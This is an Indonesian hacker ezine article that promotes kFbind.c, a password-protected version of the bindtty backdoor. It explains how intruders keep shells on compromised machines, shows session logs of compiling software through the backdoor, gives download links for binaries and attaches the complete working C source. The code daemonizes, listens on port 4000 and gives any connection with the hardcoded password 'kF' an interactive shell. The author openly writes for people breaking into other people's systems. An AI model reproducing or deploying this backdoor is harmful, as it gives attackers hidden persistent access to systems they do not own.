#########################################################################
MEMAKSIMALKAN BINDTTY (Release code: kFbind.c)
Author : KillFinger
Email  : killfinger@yahoo.com
IRC    : #SecretColony, #Level9-Team @DAL.net
SecretColony Lab N Research Group.
########################################################################

Anda para penyusup system orang lain (:P~) pasti mengenal tool yang satu ini. Ya, bindtty.c buatan sd <sd@sf.cz>, suatu
backd00r tool yang mampu membuka pintu belakang via telnet system walaupun anda tidak memiliki akses root dalam menanamnya.
(Kebanyakan backd00r butuh akses root untuk ditanam). Sayangnya, koneksinya adalah null-connection alias tanpa passwd.
(Penulis sering menemukan shell-ilegal dari bindtty ini hanya dengan membuat script IRC yang mampu menscan semua nick dalam
suatu channel, lumayan nggak perlu susah2 r00ting, cukup chatting aja :)). Ternyata, dari hasil yang didapat melalui hasil
chatting cukup memuaskan, heheheh...... (Artinya backd00r ini masih banyak diminati)

Penulis berpikir, kenapa source nya nggak di modif aja biar berpasswd. Sebenarnya nggak terlalu sulit kalau anda mengerti
bahasa program, dalam hal ini adalah C. Coba anda baca2 artikel di ezine ini, kali aja ada yang menjelaskan ttg C
programming.

Keuntungan penggunaan BINDTTY.C ini yaitu tidak terdeteksi dengan command "who" atau "w", mampu menangani multiple-login.
Tapi, sayangnya lagi backd00r (BINDTTY.C) ini masih memiliki kekurangan2.

Diantaranya:

1. Akan terlihat dengan command "ps auxw"

contoh:

 	7094 ?        S      0:00 syslogd  <-- ini syslogd palsu, perhatikan pid nya.
 	7095 pty/s0   S      0:00 sh -i    <-- ini artinya ada user yg log in via bindtty (pty/s0)
 	----------------------------- di potong -------------------------------------
 	7685 ?        S      0:00 syslogd  <-- akan nampak tiap kali ada user lain yg log in.
 	7686 pty/s1   S      0:00 sh -i    <-- tiap ada user lain log in pty akan di naikkan 1 (pty/s1)

2. Tidak mampu mengcompile atau configure source code

 contoh:

 	sh-2.05b# gcc -o kF kFbind.c
 	gcc -o kF kFbind.c
 	collect2: cannot find `ld'
 	sh-2.05b#

 	sh-2.05b# ./configure --prefix=/usr/src --sysconfdir=/etc/ssh
 	./configure --prefix=/usr/src --sysconfdir=/etc/ssh
 	checking for gcc... gcc
 	checking for C compiler default output... configure: error: C compiler cannot create executables
 	See `config.log' for more details.
 	sh-2.05b#

Nah.... artikel ini mudah2an berguna untuk mengatasi kekurangan2 tsb walaupun tidak 100%.

o> Solusi untuk nomer 2 diatas adalah dengan menggunakan "scl", bindtty-client, dari SecretColony (bisa di download
versi pre-compiled binary nya di http://secret_colony.tripod.com/scl)

contoh:

 	sh-2.05b# ./scl
 	./scl
 	use: ./scl <host> [port]
 	sh-2.05b#
 	sh-2.05b# ./scl 192.168.10.1 8888
 	./scl 192.168.10.1 8888
 	Looking up 192.168.10.1...OK
 	Trying 192.168.10.1:8888...
 	Connected to 192.168.10.1.
 	Escape character is '^]'
 	[kF@finger /]# w
 	w
 	23:16:01 up  2:53,  6 users,  load average: 0.19, 0.24, 0.24
 	USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
 	[kF@finger /]#

 	[kF@finger openssh-3.6.1p2]# ./configure --prefix=/usr/src --sysconfdir=/etc/ssh
 	<p2]$ ./configure --prefix=/usr/src --sysconfdir=/etc/ssh
 	checking for gcc... gcc
 	checking for C compiler default output... a.out
 	checking whether the C compiler works... yes
 	--------------------------------------- dipotong ---------------------------------------------------------------
 	configure: creating ./config.status
 	config.status: creating Makefile
 	config.status: creating openbsd-compat/Makefile
 	config.status: creating scard/Makefile
 	config.status: creating ssh_prng_cmds
 	config.status: creating config.h

 	OpenSSH has been configured with the following options:
 	                    User binaries: /usr/bin
 	                  System binaries: /usr/sbin
 	              Configuration files: /etc/ssh
 	                  Askpass program: /usr/libexec/ssh-askpass
 	                     Manual pages: /usr/man/manX
 	                         PID file: /var/run
 	 Privilege separation chroot path: /var/empty
 	           sshd default user PATH: /usr/bin:/bin:/usr/sbin:/sbin
 	                   Manpage format: doc
 	                      PAM support: no
 	               KerberosIV support: no
 	                KerberosV support: no
 	                Smartcard support: no
 	                      AFS support: no
 	                    S/KEY support: no
 	             TCP Wrappers support: no
 	             MD5 password support: no
 	      IP address in $DISPLAY hack: no
 	         Use IPv4 by default hack: no
 	          Translate v4 in v6 hack: yes
 	                 BSD Auth support: no
 	             Random number source: OpenSSL internal ONLY

 	              Host: i686-pc-linux-gnu
 	          Compiler: gcc
 	    Compiler flags: -g -O2 -Wall -Wpointer-arith -Wno-uninitialized
 	Preprocessor flags:
 	      Linker flags:
 	         Libraries:   -lutil -lz -lnsl  -lcrypto -lcrypt

 	[kF@finger openssh-3.7.1p2]# make;make install;make clean
 	------------------------------------ dipotong ------------------------------------------------------
 	/etc/ssh/ssh_config already exists, install will not overwrite
 	/etc/ssh/sshd_config already exists, install will not overwrite
 	/etc/ssh/moduli already exists, install will not overwrite
 	/etc/ssh/ssh_host_key already exists, skipping.
 	/etc/ssh/ssh_host_dsa_key already exists, skipping.
 	/etc/ssh/ssh_host_rsa_key already exists, skipping.
 	/usr/src/openssh-3.6.1p2/sbin/sshd -t -f /etc/ssh/sshd_config
 	[kF@finger openssh-3.7.1p2]# mv -f sshd_config /etc/ssh/sshd_config
 	[kF@finger openssh-3.7.1p2]# ps ax | grep sshd
 	23332 ?        S      0:00 /usr/sbin/sshd
 	23421 pty/s0   S      0:00 grep sshd
 	[kF@finger openssh-3.7.1p2]# kill -HUP 23332

 	[kF@finger openssh-3.7.1p2]# telnet localhost 22
 	Trying 127.0.0.1...
 	Connected to localhost (127.0.0.1).
 	Escape character is '^]'.
 	SSH-1.99-OpenSSH_3.7.1p2

Nah... tuh dah berhasil configure;make;make install. Hehehe.... lumayan kan??.
Hanya dengan menggunakan bindtty-client kekurang-mampuan bindtty dalam hal kompilasi bisa diatasi. Anda pasti ingin
mengcompile xploit terbaru biar dapet b0x baru lagi tentunya. Jadi tidak harus mencari2 xploit yang sudah pre-compiled
binary hasil kompilasi orang lain yang belum tentu terjamin keamanannya. :P~

3. Null-connection alias tanpa passwd

Untuk yang satu ini, seorang crew SecretColony (KillFinger) memodifikasi source code dari bindtty biar bisa berpasswd
sehingga lebih terjamin penggunaannya. Source code bindtty yang berpasswd di berinama kFbind.c
(terlampir di akhir artikel ini, atau bisa di download source-code nya di http://www.geocities.com/secret_colony/kFbind.c,
untuk yang pre-compiled binarynya ada di http://secret_colony.tripod.com/kF)

contoh: penggunaan kFbind.c

	[deMilo@finger ~]$ telnet localhost 4000
	Trying 127.0.0.1...
	Connected to localhost (127.0.0.1).
	Escape character is '^]'.

	passwd kF  <-- passwd default kF
	kF

	=- SecretColony Lab N Research Project -=  <-- motd
	sh-2.05b#

	[deMilo@finger ~]$ telnet localhost 4000
	Trying 127.0.0.1...
	Connected to localhost (127.0.0.1).
	Escape character is '^]'.

	passwd sembarangpasswd  <-- passwd yang salah
	sembarangpasswd

	DiE!!!
	Connection closed by foreign host.
	[deMilo@finger ~]$

4. Telnet connection

Seperti yang anda ketahui semua, bahwa telnet connection tidak secure karena menampilkan data sebagai plain text.
untuk solusinya cari sendiri ah..... Masa maunya di suapin aja. :)
B-Creative!!!

5. Penutup

Keep this Open-Source spirit up. This system is aLL about binary, if you are NOT 1 then you are 0. Knowledge is belong to
the world, share it. Kritik, saran dan caci maki silahkan kirim ke killfinger@yahoo.com.

Online BUddiEs:
A_BlAcK_LisT, Acetosal, jhon angga, ryan_the, ucoxxx, AcCezZdENieD dan KIDS_KIDS. Special buat teman2 yang
tidak bisa disebutkan satu persatu di #SecretColony, #Level9-Team @t DAL.Net.

Offline d00d:
t0t0 at jasakom (kapan nge-band lagi?), erich, d0nny, edd0, din0 at SecretColony Labs n Research Group, /bsp/mnt, yogas.

-----------------------
To follow the path;
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
-----------------------
Hacking is NOT instant.

Best Regs

KillFinger

LAMPIRAN kFbind.c mulai dari bawah ini:
---------------------------------------------------------------------------------------------------------------
						kFbind.c
---------------------------------------------------------------------------------------------------------------
/*
** kFbind.c by KillFinger
**
** compiled on any linux machine:
**
**     gcc -o kF kFbind.c
**
** This code was originally written by sd <sd@sf.cz> as bindtty.c
** And n0w actually modified by KillFinger oF SecretColony (killfinger@yahoo.com) for passwd protection
** Thanx to aLL the cr3w oF SecretColony Lab N Research Group
** sh0utz to Level9-Team f0r the sHarinG N rel4t10nsHip
**
** rEaD thiS fuCkin' soUrce c0de and cHange the passwd/port for y0ur conVenient
**
** I'vE g0t my sKILL-FINGERed. :)
**
** Fuck aLL tHose CARDERs oUt thEr3!!!!!
*/

#define HOME "/"
#define	TIOCSCTTY	0x540E
#define TIOCGWINSZ      0x5413
#define TIOCSWINSZ      0x5414
#define ECHAR	0x1d
#define PORT	4000
#define	BUF	32768

#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>

struct winsize {
	unsigned short ws_row;
	unsigned short ws_col;
	unsigned short ws_xpixel;
	unsigned short ws_ypixel;
};

/* passwd protection by KillFinger oF SecretColony */

int sc;
char passwd[] = "kF";
char motd[] ="=- SecretColony Lab N Research Project -=\n";

void kf_shell() {
char buffer[150];

write(sc, "passwd ", 7);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd)))  {
    write(sc, motd, sizeof(motd));
    }
else {
    write(sc, "DiE!!!\n", 7);
    close(sc); exit(0);
    }
}

/* creates tty/pty name by index */
void	get_tty(int num, char *base, char *buf)
{
	char	series[] = "pqrstuvwxyzabcde";
	char	subs[] = "0123456789abcdef";
	int	pos = strlen(base);
	strcpy(buf, base);
	buf[pos] = series[(num >> 4) & 0xF];
	buf[pos+1] = subs[num & 0xF];
	buf[pos+2] = 0;
}

/* search for free pty and open it */
int	open_tty(int *tty, int *pty)
{
	char	buf[512];
	int	i, fd;

	fd = open("/dev/ptmx", O_RDWR);
	close(fd);

	for (i=0; i < 256; i++) {
		get_tty(i, "/dev/pty", buf);
		*pty = open(buf, O_RDWR);
		if (*pty < 0) continue;
		get_tty(i, "/dev/tty", buf);
		*tty = open(buf, O_RDWR);
		if (*tty < 0) {
			close(*pty);
			continue;
		}
		return 1;
	}
	return 0;
}

/* to avoid creating zombies ;) */
void	sig_child(int i)
{
	signal(SIGCHLD, sig_child);
	waitpid(-1, NULL, WNOHANG);
}

void	hangout(int i)
{
	kill(0, SIGHUP);
	kill(0, SIGTERM);
}

int	main()
{
	int	pid;
	struct	sockaddr_in	serv;
	struct	sockaddr_in	cli;
	int	sock;

	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock < 0) {
		perror("socket");
		return 1;
	}

	bzero((char *) &serv, sizeof(serv));
	serv.sin_family = AF_INET;
	serv.sin_addr.s_addr = htonl(INADDR_ANY);
	serv.sin_port = htons(PORT);
	if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
		perror("bind");
		return 1;
	}
	if (listen(sock, 5) < 0) {
		perror("listen");
		return 1;
	}
	printf("kFbind is starting..."); fflush(stdout);
	pid = fork();
	if (pid !=0 ) {
		printf("OK, pid = %d\n", pid);
		printf("Enj0y y0uR d00r by SecretColony\n");
		return 0;
	}

	/* daemonize */
	setsid();
	chdir("/");
	pid = open("/dev/null", O_RDWR);
	dup2(pid, 0);
	dup2(pid, 1);
	dup2(pid, 2);
	close(pid);
	signal(SIGHUP, SIG_IGN);
	signal(SIGCHLD, sig_child);
	while (1) {
		int	scli;
		int	slen;
		slen = sizeof(cli);
		scli = accept(sock, (struct sockaddr *) &cli, &slen);
		if (scli < 0) continue;
		pid = fork();
		if (pid == 0) {
			int	subshell;
			int	tty;
			int	pty;
			fd_set	fds;
			char	buf[BUF];
			char	*argv[] = {"sh", "-i", NULL};
			#define MAXENV	256
			#define	ENVLEN	256
			char	*envp[MAXENV];
			char	envbuf[(MAXENV+2) * ENVLEN];
			int	j, i;
			char	home[256];
			/* setup enviroment */
			envp[0] = home;
			sprintf(home, "HOME=%s", HOME);
			j = 0;
			do {
				i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
				envp[j+1] = &envbuf[j * ENVLEN];
				j++;
				if ((j >= MAXENV) || (i < ENVLEN)) break;
			} while (envbuf[(j-1) * ENVLEN] != '\n');
			envp[j+1] = NULL;

			/* create new group */
			setpgid(0, 0);

			/* open slave & master side of tty */
			if (!open_tty(&tty, &pty)) {
				char	msg[] = "Can't fork pty, bye!\n";
				write(scli, msg, strlen(msg));
				close(scli);
				exit(0);
			}
			/* fork child */
			subshell = fork();
			if (subshell == 0) {
				/* close master */
				close(pty);
				/* attach tty */
				setsid();
				ioctl(tty, TIOCSCTTY);
				/* close local part of connection */
				close(scli);
				close(sock);
				signal(SIGHUP, SIG_DFL);
				signal(SIGCHLD, SIG_DFL);
				dup2(tty, 0);
				dup2(tty, 1);
				dup2(tty, 2);
				close(tty);
				kf_shell();
				execve("/bin/sh", argv, envp);
			}
			/* close slave */
			close(tty);

			signal(SIGHUP, hangout);
			signal(SIGTERM, hangout);

			while (1) {
				/* watch tty and client side */
				FD_ZERO(&fds);
				FD_SET(pty, &fds);
				FD_SET(scli, &fds);
				if (select((pty > scli) ? (pty+1) : (scli+1),
				    &fds, NULL, NULL, NULL) < 0)
				    {
				    	break;
				}
				if (FD_ISSET(pty, &fds)) {
					int	count;
					count = read(pty, buf, BUF);
					if (count <= 0) break;
					if (write(scli, buf, count) <= 0) break;
				}
				if (FD_ISSET(scli, &fds)) {
					int	count;
					unsigned	char *p, *d;
					d = buf;
					count = read(scli, buf, BUF);
					if (count <= 0) break;

					/* setup win size */
					p = memchr(buf, ECHAR, count);
					if (p) {
						unsigned char	wb[5];
						int	rlen = count - ((ulong) p - (ulong) buf);
						struct	winsize ws;

						/* wait for rest */
						if (rlen > 5) rlen = 5;
						memcpy(wb, p, rlen);
						if (rlen < 5) {
							read(scli, &wb[rlen], 5 - rlen);
						}

						/* setup window */
						ws.ws_xpixel = ws.ws_ypixel = 0;
						ws.ws_col = (wb[1] << 8) + wb[2];
						ws.ws_row = (wb[3] << 8) + wb[4];
						ioctl(pty, TIOCSWINSZ, &ws);
						kill(0, SIGWINCH);

						/* write the rest */
						write(pty, buf, (ulong) p - (ulong) buf);
						rlen = ((ulong) buf + count) - ((ulong)p+5);
						if (rlen > 0) write(pty, p+5, rlen);
					} else
						if (write(pty, d, count) <= 0) break;

				}
			}
			close(scli);
			close(sock);
			close(pty);
			waitpid(subshell, NULL, 0);
			vhangup();
			exit(0);
		}
		close(scli);
	}
}